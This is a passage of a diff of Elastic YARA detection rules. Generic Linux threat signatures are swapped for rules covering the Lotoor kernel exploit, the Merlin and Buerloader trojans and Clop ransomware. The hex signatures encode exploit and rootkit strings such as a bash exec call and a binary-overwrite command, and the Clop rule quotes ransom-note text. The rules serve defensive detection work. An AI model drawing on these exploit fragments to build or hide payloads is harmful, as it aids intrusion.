"https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L101-L119" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "ecc6635117b99419255af5d292a7af3887b06d5f3b0f59d158281eebfe606445" + logic_hash = "1e9faba4f245d8b0d6944430286a5fc3e11cd7e036a4151b29fc2c5f037894fb" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "e5c5833e193c93191783b6b5c7687f5606b1bbe2e7892086246ed883e57c5d15" - severity = 50 + fingerprint = "6878670c1fa154f5c4a845a824c63d0a900359b6e122b3fa759077c6a7e33e4c" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 2E 2F 6F 76 6C 63 61 70 2F 6D 65 72 67 65 2F 6D 61 67 69 63 } - $a2 = { 65 78 65 63 6C 20 2F 62 69 6E 2F 62 61 73 68 } + $a = { C2 75 64 4C 8B 45 F0 49 83 C0 04 4C 8B 4D F0 49 83 C1 08 48 8B } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_6Bed4416 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_B293F6Ec : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "6bed4416-18fe-4416-a6ee-89d269922347" - date = "2024-01-18" - modified = "2024-02-13" + id = "b293f6ec-0342-4727-b2a1-bd60be11ef74" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L248-L266" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a2b54f789a1c4cbed13e0e2a5ab61e0ce5bb42d44fe52ad4b7dd3da610045257" - logic_hash = "c098e27a12d5d10af67d1b78572bc7daeb500504527428366e1d9a4e55e0f4d7" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L121-L139" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d1fa8520d3c3811d29c3d5702e7e0e7296b3faef0553835c495223a2bc015214" + logic_hash = "0e310082714f5283f9b4ccde5a8e17994e3bc4acf3d744b22734c136dde7cebb" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "f9d39e6aa9f8b005ff156923c68d215dabf2db79bd7d4a3dccb9ead8f1a28d88" - severity = 50 + fingerprint = "42c95bdd82e398bceeb985cff50f4613596b71024c052487f5b337bb35489594" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 61 64 78 61 65 73 61 76 78 62 69 6E 63 67 6F 64 69 72 64 6E 73 65 6E 64 66 69 6E 66 6D 61 66 74 70 67 63 20 67 70 20 69 6E 20 69 6E 74 6D 61 70 6E 69 6C 6F 62 6A 70 63 3D 70 74 72 73 65 74 73 68 61 73 73 68 74 63 70 75 64 70 } + $a = { B8 89 45 A8 8B 45 A8 83 C0 64 89 45 B4 EB 2A 8B 45 A8 48 98 48 C1 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_Fc5B5B86 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_C5983669 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "fc5b5b86-fa68-428d-ba31-67057380a10b" - date = "2024-01-18" - modified = "2024-02-13" + id = "c5983669-67d6-4a9e-945f-aae383211872" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L268-L286" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "134b063d9b5faed11c6db6848f800b63748ca81aeca46caa0a7c447d07a9cd9b" - logic_hash = "a11ed323df7283188cf99ca89abbd18673fef88660df1150d4dc72de04a836a8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L141-L159" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d08be92a484991afae3567256b6cec60a53400e0e9b6f6b4d5c416a22ccca1cf" + logic_hash = "ff673070969f1ededf8ff2c7cadfc251c7d2e52da58906b15cfc04593a755d55" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "bae66e297c19cf9c278eaefcd3cc8b3c972381effd160ee99e6f04f4ac74389d" - severity = 50 + fingerprint = "1d74ddacc623a433f84b1ab6e74bcfc0e69afb29f40a8b2d660d96a88610c3b2" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 14 8B 44 24 18 8B 08 89 0C 24 89 44 24 04 C6 44 24 08 00 E8 74 1D 00 00 8B 44 24 0C 89 44 24 10 8B 4C 24 18 8B 09 89 04 24 8B 54 24 1C 89 54 24 04 89 4C 24 08 E8 92 98 05 00 8B 44 24 } + $a = { 48 83 C0 58 48 89 44 24 20 48 8B 44 24 18 48 89 C7 BA 60 00 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_2C8D824C : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_Fbff22Da : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "2c8d824c-4791-46a6-ba4d-5dcc09fdc638" - date = "2024-01-18" - modified = "2024-02-13" + id = "fbff22da-2f31-416c-8aa0-1003e3be8baa" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L288-L306" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9106bdd27e67d6eebfaec5b1482069285949de10afb28a538804ce64add88890" - logic_hash = "c8fc90ec5e93ff39443f513e83f34140819a30b737da2a412ba97a7b221ca9dc" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L161-L179" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0762fa4e0d74e3c21b2afc8e4c28e2292d1c3de3683c46b5b77f0f9fe1faeec7" + logic_hash = "d3e3037593f5714dfb49c6e19631fd46331e2702c8bf6d6099bb5b34158321a9" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8e54bf3f6b7b563d773a1f5de0b37b8bec455c44f8af57fde9a9b684bb6f5044" - severity = 50 + fingerprint = "b649b172fad3e3b085cbf250bd17dbea4c409a7337914c63230d188f9b8135fa" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 38 48 89 5C 24 50 48 89 7C 24 60 48 89 4C 24 58 48 8B 10 48 8B 40 08 48 8B 52 28 FF D2 48 89 44 24 28 48 89 5C 24 18 48 8B 4C 24 50 31 D2 90 EB 03 48 FF C2 48 39 D3 7E 6C 48 8B 34 D0 } + $a = { 00 75 6E 61 6D 65 00 73 74 72 6C 65 6E 00 73 74 64 6F 75 74 00 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_936B24D5 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_E2D5Fad8 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "936b24d5-f8d7-44f1-a541-94c30a514a11" - date = "2024-01-18" - modified = "2024-02-13" + id = "e2d5fad8-45b6-4d65-826d-b909230e2b69" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L308-L326" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fb8eb0c876148a4199cc873b84fd9c1c6abc1341e02d118f72ffb0dae37592a4" - logic_hash = "972bbc4950c49ff7bc880b1d24b586072eb8541584b97a00ac501fac133a3157" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L181-L199" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7e54e57db3de32555c15e529c04b35f52d75af630e45b5f8d6c21149866b6929" + logic_hash = "b294ce1c4d928d73342bb6260456d850f9c59f3c48c7c4ffbce32ea9238f6eee" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "087f31195b3eaf51cd03167a877e54a5ba3ca9941145d8125c823100ba6401c4" - severity = 50 + fingerprint = "ec64f2c3ca5ec2bfc2146159dab3258e389be5962bdddf4c6db5975cc730a231" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 66 73 65 65 6B 6F 28 6F 70 74 2E 64 69 63 74 2C 20 30 4C 2C 20 53 45 45 4B 5F 45 4E 44 29 20 21 3D 20 2D 31 } + $a = { 8B 45 E4 8B 00 89 45 E8 8B 45 E8 8B 00 85 C0 75 08 8B 45 E8 89 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_98Bbca63 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_F2F8Eb6B : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "98bbca63-68c4-4b32-8cb6-50f9dad0a8f2" - date = "2024-01-22" - modified = "2024-02-13" + id = "f2f8eb6b-1fc3-4fca-b58d-d71ad932e1a7" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L328-L347" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "1d4d3d8e089dcca348bb4a5115ee2991575c70584dce674da13b738dd0d6ff98" - logic_hash = "1728d47b3f364cff02ae61ccf381ecab0c1fe46a5c76d832731fdf7acc1caf55" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L201-L219" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "01721b9c024ca943f42c402a57f45bd4c77203a604c5c2cd26e5670df76a95b2" + logic_hash = "b6555e69b663591550976fd44352ecbdf0a0aef1e07a64396a576125a4fe4ba6" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "d10317a1a09e86b55eb7b00a87cb010e0d2f11ade2dccc896aaeba9819bd6ca5" - severity = 50 + fingerprint = "881e2cd5b644c2511306b3670320224810de369971278516f7562076226fa5b7" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 64 65 73 63 72 69 70 74 69 6F 6E 3D 4C 4B 4D 20 72 6F 6F 74 6B 69 74 } - $a2 = { 61 75 74 68 6F 72 3D 6D 30 6E 61 64 } + $a = { 24 14 40 00 00 00 EB 38 8B 44 24 14 48 98 83 E0 3F 48 85 C0 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_9Aaf894F : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_89671B03 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "9aaf894f-d3f0-460d-82f8-831fecdf8b09" - date = "2024-01-22" - modified = "2024-02-13" + id = "89671b03-5bd4-481b-9304-2655ea689c5f" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L349-L367" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "467ac05956eec6c74217112721b3008186b2802af2cafed6d2038c79621bcb08" - logic_hash = "b28d6a8c23aba4371e2e5f48861d2bcc8bdfa7212738eda7b1b4a3059d159cf2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L241-L259" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "001098473574cfac1edaca9f1180ab2005569e094be63186c45b48c18f880cf8" + logic_hash = "dfa7027c4fa0cbde33df87063fea4ecf51a085f3cc1805123c62747882d0a07e" score = 75 quality = 73 tags = "FILE, MEMORY" - fingerprint = "15518c7e99ed1f39db2fe21578c08aadf8553fdb9cb44e4342bf117e613c6c12" - severity = 50 + fingerprint = "e8b9631e5d4d8db559615504cc3f6fbd8a81bfbdb9e570113f20d006c44c8a9c" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 2F 62 69 6E 2F 63 70 20 2F 74 6D 70 2F 70 61 6E 77 74 65 73 74 20 2F 75 73 72 2F 62 69 6E 2F 70 73 } + $a = { 62 65 6C 3A 20 4C 69 6E 75 78 20 3C 20 32 2E 36 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_Ba3A047D : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_Dbc73Db0 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "ba3a047d-effc-444b-85b7-d31815e61dfb" - date = "2024-01-22" - modified = "2024-02-13" + id = "dbc73db0-527c-436f-afdc-bc3750f10ea0" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L369-L388" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3064e89f3585f7f5b69852f1502e34a8423edf5b7da89b93fb8bd0bef0a28b8b" - logic_hash = "ffcfb90c0c796b7b343adbd2142193759ececddd0700c0bb4e2898947464b1a2" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L261-L279" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "9fe78e4dd7975856a74d8dfd83e69793a769143e0fe6994cbc3ef28ea37d6cf8" + logic_hash = "4a7453342fd72dacb781919d3fac3bab02e7ef7c882d5938a2e0e1274c704705" score = 75 - quality = 71 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "3f43a4e73a857d07c3623cf0278eecf26ef51f4a75b7913a72472ba6738adeac" - severity = 50 + fingerprint = "2f6ad833b84f00be1d385de686a979d3738147c38b4126506e56225080ee81ef" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 52 65 61 64 69 6E 67 20 61 74 20 6D 61 6C 69 63 69 6F 75 73 5F 78 20 3D 20 25 70 2E 2E 2E 20 } - $a2 = { 28 73 65 63 6F 6E 64 20 62 65 73 74 3A 20 30 78 25 30 32 58 20 73 63 6F 72 65 3D 25 64 29 } + $a = { 63 75 73 3A 20 4C 69 6E 75 78 20 32 2E 36 2E 33 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_902Cfdc5 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_Ec339160 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "902cfdc5-7f71-4661-af17-9f3dd9b21daa" - date = "2024-01-23" - modified = "2024-02-13" + id = "ec339160-5f25-495c-8e48-4683ad2fcca0" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L390-L408" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "3fa5057e1be1cfeb73f6ebcdf84e00c37e9e09f1bec347d5424dd730a2124fa8" - logic_hash = "0f86914cb598262744660e65048f75d071307ae47d069971bfcd049a7d4b36e5" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L281-L299" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "0002b469972f5c77a29e2a2719186059a3e96a6f4b1ef2d18a68fee3205ea0ba" + logic_hash = "9c1d1254093b172798024c42a6d78f5e6720d20b8c2a8ad4ca26c8e88e42f0e8" score = 75 quality = 73 tags = "FILE, MEMORY" - fingerprint = "d692401d70f20648e9bb063fc8f0e750349671e56a53c33991672d29eededcb4" - severity = 50 + fingerprint = "24a3630fd49860104c60c4f4d0ef03bd17c124383a0b5d027a06c7ca6cb9cbba" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 54 65 67 73 6B 54 47 66 42 7A 4C 35 5A 58 56 65 41 54 4A 5A 2F 4B 67 34 67 47 77 5A 4E 48 76 69 5A 49 4E 50 49 56 70 36 4B 2F 2D 61 77 33 78 34 61 6D 4F 57 33 66 65 79 54 6F 6D 6C 71 37 2F 57 58 6B 4F 4A 50 68 41 68 56 50 74 67 6B 70 47 74 6C 68 48 } + $a = { 69 75 6D 3A 20 4C 69 6E 75 78 20 32 2E 58 20 73 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_094C1238 : FILE MEMORY +rule ELASTIC_Linux_Exploit_Lotoor_7Cd57E18 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Exploit Lotoor (Linux.Exploit.Lotoor)" author = "Elastic Security" - id = "094c1238-32e7-43b8-bf5e-187cf3a28c9f" - date = "2024-01-23" - modified = "2024-02-13" + id = "7cd57e18-2315-419b-b373-ea801181232c" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L410-L428" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "2bfe7d51d59901af345ef06dafd8f0e950dcf8461922999670182bfc7082befd" - logic_hash = "fb82e16bf153c88377cc8655557bc1f021af6e04e1160129ce9555e078d00a0d" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Exploit_Lotoor.yar#L301-L319" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "1eecf16dae302ae788d1bc81278139cd9f6af52d7bed48b8677b35ba5eb14e30" + logic_hash = "97604cdc9daa9993b9a18dc5df7ab105a5e6001129bcfcfeeb86640bee26f59d" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "1b36f7415f215c6e39e9702ae6793fffd7c7ecce1884767b5c24a1e086101faf" - severity = 50 + fingerprint = "a7d3183de1bccd816bcd2346e9754aaf6e7eb124d7416d79bdbe422b33035414" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 48 81 EC 18 01 00 00 48 89 D3 41 89 F6 49 89 FF 64 48 8B 04 25 28 00 00 00 48 89 84 24 10 01 00 00 49 89 E4 4C 89 E7 E8 FD 08 00 00 48 89 DF E8 75 08 00 00 4C 89 E7 48 89 DE 89 C2 E8 F8 08 00 } + $a = { 76 65 3A 20 4C 69 6E 75 78 20 32 2E 36 2E } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_A8Faf785 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Merlin_E8Ecb3Be : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Windows Trojan Merlin (Windows.Trojan.Merlin)" author = "Elastic Security" - id = "a8faf785-997d-4be8-9d10-c6e7050c257b" - date = "2024-01-23" - modified = "2024-02-13" + id = "e8ecb3be-edba-4617-b4df-9d5b6275d310" + date = "2022-01-05" + modified = "2022-04-12" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L430-L448" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "6028562baf0a7dd27329c8926585007ba3e0648da25088204ebab2ac8f723e70" - logic_hash = "3ab5d9ba39be2553173f6eb4d2a1ca22bfb9f1bd537fed247f273eba1eabd782" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Merlin.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "768c120e63d3960a0842dcc538749955ab7caabaeaf3682f6d1e30666aac65a8" + logic_hash = "293158c981463544abd0c38694bfc8635ad1a679bbae115521b65879f145cea6" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "c393af7d7fb92446019eed23bbf216d941a9598dd52ccb610432985d0da5ce04" - severity = 50 + fingerprint = "54e03337930d74568a91e797cfda3b7bfbce3aad29be2543ed58c51728d8e185" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 55 89 E5 53 57 56 83 E4 F0 83 EC 10 E8 00 00 00 00 5B 81 C3 53 50 00 00 8B 45 0C 8B 4D 10 8B 55 08 65 8B 35 14 00 00 00 89 74 24 08 8D 75 14 89 74 24 04 8B 3A 56 51 50 52 FF 97 CC 01 00 00 83 } + $a = { AF F0 4C 01 F1 4C 8B B4 24 A8 00 00 00 4D 0F AF F4 4C 01 F1 4C 8B B4 24 B0 00 } condition: all of them } -rule ELASTIC_Linux_Generic_Threat_04E8E4A5 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Buerloader_C8A60F46 : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Windows Trojan Buerloader (Windows.Trojan.Buerloader)" author = "Elastic Security" - id = "04e8e4a5-a1e1-4850-914a-d7e583d052a3" - date = "2024-01-23" - modified = "2024-02-13" + id = "c8a60f46-d49a-4566-845b-675fb55c201c" + date = "2021-08-16" + modified = "2021-10-04" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L450-L468" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "248f010f18962c8d1cc4587e6c8b683a120a1e838d091284ba141566a8a01b92" - logic_hash = "9b04725bf0a75340c011028b201ed08eb9de305a5b4630cc79156c0a847cdc9e" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_Buerloader.yar#L1-L24" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "3abed86f46c8be754239f8c878f035efaae91c33b8eb8818c5bbed98c4d9a3ac" + logic_hash = "d11b117efc10547e77ce8979f8a1d42f34937101e58a0e36228baa37cd30d2aa" score = 75 - quality = 75 + quality = 73 tags = "FILE, MEMORY" - fingerprint = "08e48ddeffa8617e7848731b54a17983104240249cddccc5372c16b5d74a1ce4" - severity = 50 + fingerprint = "346233f4b1306eb574b4063d3b47f90e65a81ad7fe1c74d2a68640d99d456c4c" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = { 48 81 EC F8 01 00 00 48 8D 7C 24 10 E8 60 13 00 00 48 8D 7C 24 10 E8 12 07 00 00 85 ED 74 30 48 8B 3B 48 8D 54 24 02 48 B8 5B 6B 77 6F 72 6B 65 72 BE 0D 00 00 00 48 89 44 24 02 C7 44 24 0A 2F } + $a1 = "User-Agent: Host: HTTP/1.1" ascii fullword + $a2 = "ServerHelloPayloadrandom" ascii fullword + $a3 = "Bad JSON in payload" ascii fullword + $a4 = { 7B 22 68 65 6C 6C 6F 22 3A 20 22 77 6F 72 6C 64 22 7D 48 54 54 50 2F 31 2E 31 20 33 30 31 20 46 6F 75 6E 64 } + $a5 = "PayloadU24UnknownExtensiontyp" ascii fullword + $a6 = " NTDLL.DLL" wide fullword condition: all of them } -rule ELASTIC_Linux_Generic_Threat_47B147Ec : FILE MEMORY +rule ELASTIC_Linux_Ransomware_Clop_728Cf32A : FILE MEMORY { meta: - description = "Detects Linux Generic Threat (Linux.Generic.Threat)" + description = "Detects Linux Ransomware Clop (Linux.Ransomware.Clop)" author = "Elastic Security" - id = "47b147ec-bcd2-423a-bc67-a85712d135eb" - date = "2024-02-01" + id = "728cf32a-94c1-4979-b092-6851649946be" + date = "2023-07-27" modified = "2024-02-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Generic_Threat.yar#L470-L488" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "cc7734a10998a4878b8f0c362971243ea051ce6c1689444ba6e71aea297fb70d" - logic_hash = "84c68f2ed76d644122daf81d41d4eb0be9aa8b1c82993464d3138ae30992110f" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Ransomware_Clop.yar#L1-L22" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "09d6dab9b70a74f61c41eaa485b37de9a40c86b6d2eae7413db11b4e6a8256ef" + logic_hash = "31c2fdfcfc46ad1dd69489536172937b9771d8505f36c7bd8dc796f40a2fe4d2" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "38f55b825bbd1fa837b2b9903d01141a071539502fe21b874948dbc5ac215ae8" - severity = 50 + fingerprint = "86644f9f1e9f0b69896cd05ae1442a3b99483cc0ff15773c0c3403e59b6d5c97" + severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" os = "linux" strings: - $a1 = { 50 41 54 48 3D 2F 62 69 6E 3A 2F 73 62 69 6E 3A 2F 75 73 72 2F 73 62 69 6E 3A 2F 75 73 72 2F 62 69 6E 3A 2F 75 73 72 2F 6C 6F 63 61 6C 2F 62 69 6E 3A 2F 75 73 72 2F 6C 6F 63 61 6C 2F 73 62 69 6E } + $a1 = "CONTACT US BY EMAIL:" + $a2 = "OR WRITE TO THE CHAT AT->" + $a3 = "(use TOR browser)" + $a4 = ".onion/" condition: - all of them + 3 of them } -rule ELASTIC_Linux_Generic_Threat_887671E9 : FILE MEMORY +rule ELASTIC_Windows_Ransomware_Maui_266Dea64 : FILE 